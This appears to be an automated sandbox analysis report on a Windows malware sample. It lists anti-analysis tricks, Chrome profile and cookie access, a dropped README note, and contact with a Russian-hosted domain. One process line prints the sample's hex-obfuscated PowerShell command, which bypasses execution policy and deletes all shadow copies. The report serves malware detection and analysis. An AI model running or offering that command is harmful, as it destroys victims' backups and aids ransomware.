Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: OpenSCManagerW,EnumServicesStatusExW,RtlAllocateHeap,EnumServicesStatusExW,_wcslwr,wcsstr,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,wcslen,CloseServiceHandle,RtlFreeHeap, 0_2_00CE4C7B
Contains functionality to query network adapater information
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: GetAdaptersInfo,RtlAllocateHeap,GetAdaptersInfo,inet_addr,RtlFreeHeap, 0_2_00CE6F46
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6102 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3111 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2208 Thread sleep count: 6102 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4852 Thread sleep count: 3111 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5490 RtlAllocateHeap,RtlAllocateHeap,wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcslen,wcscpy,GetFileAttributesW,PathIsDirectoryEmptyW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap, 0_2_00CE5490
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE67AD RtlAllocateHeap,RtlAllocateHeap,wcscpy,GetFileAttributesW,PathAddBackslashW,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,_wcsicmp,wcsstr,wcsstr,GetFileAttributesW,wcsrchr,FindNextFileW,FindClose,wcsrchr,wcsrchr,PathIsDirectoryEmptyW,RemoveDirectoryW,RtlFreeHeap,RtlFreeHeap, 0_2_00CE67AD
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE525B wcscpy,wcslen,FindFirstFileExW,wcscpy,wcsrchr,wcscpy,FindNextFileW,FindClose, 0_2_00CE525B
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE5368 wcscpy,wcslen,FindFirstFileExW,wcscpy,wcslen,wcscpy,FindNextFileW,FindClose, 0_2_00CE5368
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE51E6 GetLogicalDriveStringsW,GetDriveTypeW,wcscpy, 0_2_00CE51E6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome Jump to behavior
Source: powershell.exe, 00000006.00000003.279613000.00000165FE227000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE380C GetWindowsDirectoryW,wcscat,wcscat,NtAllocateVirtualMemory,wcscpy,RtlEnterCriticalSection,RtlInitUnicodeString,RtlInitUnicodeString,RtlLeaveCriticalSection,LdrEnumerateLoadedModules, 0_2_00CE380C
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE57E5 wcsrchr,GetCurrentProcessId,RtlAllocateHeap,NtQuerySystemInformation,RtlReAllocateHeap,RtlFreeHeap,RtlAllocateHeap,OpenProcess,DuplicateHandle,wcsrchr,_wcsicmp,RtlAllocateHeap,NtQueryInformationProcess,wcsrchr,_wcsicmp,wcslen,CloseHandle,TerminateProcess,WaitForSingleObject,CloseHandle,RtlFreeHeap,CloseHandle,CloseHandle,RtlFreeHeap,RtlFreeHeap, 0_2_00CE57E5
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E49 mov eax, dword ptr fs:[00000030h] 0_2_00CE7E49
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE7E53 mov eax, dword ptr fs:[00000030h] 0_2_00CE7E53
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE1F0F mov eax, dword ptr fs:[00000030h] 0_2_00CE1F0F
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep bypass -c '(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s' Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Code function: 0_2_00CE301C ImpersonateLoggedOnUser,GetUserNameW,GetComputerNameW,RtlAllocateHeap,_swprintf,RtlReAllocateHeap,RtlFreeHeap,RtlFreeHeap,RevertToSelf, 0_2_00CE301C
Source: C:\Users\user\Desktop\rUUR0qQI22.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\58ea1f927c503c2b_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\5febb783fe057117_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\33d102032f141cd7_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fee6704ec67d5ed1_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000009 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000008 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\181db4280bb3db70_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fc9785cdcbaea0b7_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\78ce8e30f78a2d10_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\e868dd9b-f73d-43ab-8047-36e4bd92d922 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\NULL Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOCK Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\244f905c10de3c26_0 Jump to behavior
Source: C:\Users\user\Desktop\rUUR0qQI22.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 401962 Sample: rUUR0qQI22 Startdate: 01/05/2021 Architecture: WINDOWS Score: 100 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 4 other signatures 2->32 7 rUUR0qQI22.exe 2 16 2->7         started        process3 dnsIp4 22 securebestapp20.com 185.105.109.19, 443 EUROBYTEEurobyteLLCMoscowRussiaRU Russian Federation 7->22 24 192.168.2.1 unknown unknown 7->24 20 C:\README.418990b0.TXT, ASCII 7->20 dropped 34 Obfuscated command line found 7->34 36 Contains functionalty to change the wallpaper 7->36 38 Bypasses PowerShell execution policy 7->38 40 2 other signatures 7->40 12 powershell.exe 19 7->12         started        14 cmd.exe 1 7->14         started        file5 signatures6 process7 process8 16 conhost.exe 12->16         started        18 conhost.exe 14->18         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.105.109.19
 securebestapp20.com Russian Federation
210079 EUROBYTEEurobyteLLCMoscowRussiaRU false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
securebestapp20.com 185.105.109.19 true